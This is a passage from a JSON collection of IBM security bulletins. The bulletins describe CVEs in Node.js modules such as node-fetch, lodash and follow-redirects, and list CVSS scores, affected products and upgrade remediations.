Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-09-21T09:52:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Nodejs node-fetch affects IBM Cloud Pak for Multicloud Management Managed Services", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-09-21T09:52:04", "id": "D224038BE1C5B28D93803F4019B326C9B17606EF82CD73FB95293E7CA7C36468", "href": "https://www.ibm.com/support/pages/node/6621967", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-28T21:38:50", "description": "## Summary\n\nNode.js module node-fetch is used by IBM App Connect Enterprise Certified Container for HTTP communications. IBM App Connect Enterprise Certified Container operands may be vulnerable to loss of confidentiality. This bulletin provides patch information to address the reported vulnerability CVE-2022-0235 in Node.js module node-fetch.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0235](<https://vulners.com/cve/CVE-2022-0235>) \n** DESCRIPTION: **Node.js node-fetch could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw when fetching a remote url with Cookie. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 4.1 \nApp Connect Enterprise Certified Container| 4.2 \n \n\n\n## Remediation/Fixes\n\nApp Connect Enterprise Certified Container 4.1 and 4.2 (Continuous Delivery) \n\nUpgrade to App Connect Enterprise Certified Container Operator version 5.0.0 or higher, and ensure that all components are at 12.0.5.0-r1-lts or higher. Documentation on the upgrade process is available at <https://www.ibm.com/docs/en/app-connect/containers_cd?topic=releases-upgrading-operator>\n\n**App Connect Enterprise Certified Container 5.0 LTS (Long Term Support)**\n\nUpgrade to App Connect Enterprise Certified Container Operator 5.0 LTS is not affected\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-11-04T18:24:21", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container operands may be vulnerable to loss of confidentiality due to CVE-2022-0235", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-11-04T18:24:21", "id": "6758266A7390DD86DCC39627FCB97E5999C1246244C7FD8A7CE56F3FFF7DB72F", "href": "https://www.ibm.com/support/pages/node/6837327", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-28T01:48:31", "description": "## Summary\n\nA security vulnerability in Node.js node-fetch module affects IBM Cloud Automation Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0235](<https://vulners.com/cve/CVE-2022-0235>) \n** DESCRIPTION: **Node.js node-fetch could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw when fetching a remote url with Cookie. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217758](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217758>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Automation Manager| 4.2.0.1 \n \n\n\n## Remediation/Fixes\n\nDownload IBM Cloud Automation Manager 4.2.0.1 iFix 6 from [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build601049&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build601049&includeSupersedes=0>)\n\nFollow the instructions in Readme link in [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build601049&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build601049&includeSupersedes=0>) to install the iFix 6 to your IBM Cloud Automation Manager 4.2.0.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-03-15T17:43:07", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Automation Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-03-15T17:43:07", "id": "62A0E59EAB7A2FA0DBD2BB5063BE3EDF565D21DBC6282F80891D4898DEC5B043", "href": "https://www.ibm.com/support/pages/node/6563569", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-28T01:57:01", "description": "## Summary\n\nA security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Managed Service.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-23334](<https://vulners.com/cve/CVE-2021-23334>) \n** DESCRIPTION: **Node.js static-eval module could allow a remote attacker to execute arbitrary code on the system, caused by a code injection flaw in FunctionExpressions and TemplateLiterals. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Infrastructure Management| All \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 by following the instructions in <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=installation-upgrade.>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-19T17:14:40", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Managed Service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23334", "CVE-2021-23337"], "modified": "2021-05-19T17:14:40", "id": "D8582663E621E7FA23FD9F12EB4D3E34A5AF5BAA61771775D239C395FB2A8F65", "href": "https://www.ibm.com/support/pages/node/6454579", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:37:46", "description": "## Summary\n\nThe product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM has addressed the vulnerabilities.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44906](<https://vulners.com/cve/CVE-2021-44906>) \n** DESCRIPTION: **Node.js Minimist module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in setKey() function in the index.js script. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2020-7598](<https://vulners.com/cve/CVE-2020-7598>) \n** DESCRIPTION: **minimist could provide weaker than expected security, caused by a prototype pollution flaw. By sending a specially crafted request, a remote attacker could exploit this vulnerability to add or modify properties of Object.prototype. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/177780](<https://exchange.xforce.ibmcloud.com/vulnerabilities/177780>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-23346](<https://vulners.com/cve/CVE-2021-23346>) \n** DESCRIPTION: **Node.js html-parse-stringify and html-parse-stringify2 modules are vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS). By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause the process to freeze, and results in a denial of service condition. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197736](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197736>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44907](<https://vulners.com/cve/CVE-2021-44907>) \n** DESCRIPTION: **Qs is vulnerable to a denial of service, caused by insufficient sanitization of property in the gs.parse function. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222194](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222194>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-23566](<https://vulners.com/cve/CVE-2021-23566>) \n** DESCRIPTION: **Nanoid could allow a local attacker to obtain sensitive information, caused by a flaw in the valueOf() function. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217348](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217348>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nAnalyst Workflow| 1.0.0 - 2.15.1 \n \n## Remediation/Fixes\n\n[Update to 2.31.4](<https://exchange.xforce.ibmcloud.com/hub/extension/ec3471adfdbb0b7bb3fbcf60f0ba5837> \"Update to 2.31.4\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T21:11:26", "type": "ibm", "title": "Security Bulletin: IBM Security QRadar Analyst Workflow app for IBM QRadar SIEM is vulnerable to using components with known vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7598", "CVE-2021-23346", "CVE-2021-23566", "CVE-2021-44906", "CVE-2021-44907", "CVE-2022-0155", "CVE-2022-0536"], "modified": "2022-10-19T21:11:26", "id": "B13A430866DCA64C67F6C19A04FDDBD8E0F1F18817F983A4A482E59069E86B7E", "href": "https://www.ibm.com/support/pages/node/6827633", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-31T14:52:52", "description": "## Summary\n\nMultiple vulnerabilities found in follow-redirect, html-parse-stringify2, nth-check, pycrypto affect Cloud Pak System. IBM Cloud Pak System has addressed those vulnerabilities. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23346](<https://vulners.com/cve/CVE-2021-23346>) \n** DESCRIPTION: **Node.js html-parse-stringify and html-parse-stringify2 modules are vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS). By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause the process to freeze, and results in a denial of service condition. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197736](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197736>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-6594](<https://vulners.com/cve/CVE-2018-6594>) \n** DESCRIPTION: **PyCrypto could allow a remote attacker to obtain sensitive information, caused by the generation of weak ElGamal key parameters in the lib/Crypto/PublicKey/ElGamal.py. By reading ciphertext data, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138678](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138678>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2013-1445](<https://vulners.com/cve/CVE-2013-1445>) \n** DESCRIPTION: **PyCrypto could allow a remote attacker to obtain sensitive information, caused by a race condition in the Crypto.Random pseudo-random number generator (PRNG). An attacker could exploit this vulnerability using brute force techniques to discover cryptographic keys and other sensitive information. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/88132](<https://exchange.xforce.ibmcloud.com/vulnerabilities/88132>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2012-2417](<https://vulners.com/cve/CVE-2012-2417>) \n** DESCRIPTION: **PyCrypto could provide weaker than expected security, caused by an error when generating keys using the ElGamal scheme. A remote attacker could exploit this vulnerability using brute force techniques to derive the private key. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75871](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75871>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2013-7459](<https://vulners.com/cve/CVE-2013-7459>) \n** DESCRIPTION: **PyCrypto is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the ALGnew function in block_templace.c. By using a specially crafted iv parameter to cryptmsg.py, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/124083](<https://exchange.xforce.ibmcloud.com/vulnerabilities/124083>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3803](<https://vulners.com/cve/CVE-2021-3803>) \n** DESCRIPTION: **nth-check is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209593](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209593>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Pak System Software Suite| 2.3.3.0 - 2.3.3.5 \nIBM Cloud Pak System| 2.3, 2.3.0.1, 2.3.1.0 (intel) \nIBM Cloud Pak System| 2.3.3.0. - 2.3.3.5 (Intel) \n \n\n\n## Remediation/Fixes\n\nFor unsupported version/system IBM recommends to upgrade to supported version/system ion the product.\n\nFor IBM Cloud Pak System 2.3.0.1, 2.3.1.0, v2.3.3.0, v2.3.3.1, v2.3.3.2, v2.3.3.3, v2.3.3.3 Interim Fix1, v2.3.3.4, v2.3.3.5, \n\nUpgrade to Cloud Pak System v2.3.3.6 available at [FixCentral](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=PureSystems&product=ibm/WebSphere/IBM+Cloud+Pak+System&release=2.3.3.6&platform=Linux&function=all> \"FixCentral\" ).\n\nInformation on upgrading at : <http://www.ibm.com/support/docview.wss?uid=ibm10887959>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-31T14:17:53", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in software used in node.js affect Cloud Pak System", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2417", "CVE-2013-1445", "CVE-2013-7459", "CVE-2018-6594", "CVE-2021-23346", "CVE-2021-3803", "CVE-2022-0155", "CVE-2022-0536"], "modified": "2023-03-31T14:17:53", "id": "D621517F57ACD56DDAC677E57D8D563065B8C2304D61C2A6E25BD3655A6E438E", "href": "https://www.ibm.com/support/pages/node/6967187", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:54:34", "description": "## Summary\n\nVulnerabilities in Apache Commons and Node .js such as denial of service, execution of arbitrary commands on the system, and elevated privileges, may affect IBM Spectrum Protect Plus.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35515](<https://vulners.com/cve/CVE-2021-35515>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an infinite loop flaw in the construction of the list of codecs that decompress an entry. By persuading a victim to open a specially-crafted 7Z archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' sevenz package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205304](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205304>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-35517](<https://vulners.com/cve/CVE-2021-35517>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out of memory error when allocating large amounts of memory. By persuading a victim to open a specially-crafted TAR archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' tar package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205307](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205307>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-36090](<https://vulners.com/cve/CVE-2021-36090>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted ZIP archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' zip package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205310](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205310>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-22918](<https://vulners.com/cve/CVE-2021-22918>) \n** DESCRIPTION: **Node.js is vulnerable to a denial of service, caused by an out-of-bounds read in the libuv's uv__idna_toascii() function. By invoking the function using dns module's lookup() function, a remote attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/204784](<https://exchange.xforce.ibmcloud.com/vulnerabilities/204784>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L) \n \n** CVEID: **[CVE-2021-22921](<https://vulners.com/cve/CVE-2021-22921>) \n** DESCRIPTION: **Node.js could allow a local attacker to gain elevated privileges on the system, caused by improper configuration of permissions in the installation directory. Under certain conditions. An attacker could exploit this vulnerability to perform PATH and DLL hijacking attacks. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/204785](<https://exchange.xforce.ibmcloud.com/vulnerabilities/204785>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21388](<https://vulners.com/cve/CVE-2021-21388>) \n** DESCRIPTION: **Node.js systeminformation module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw 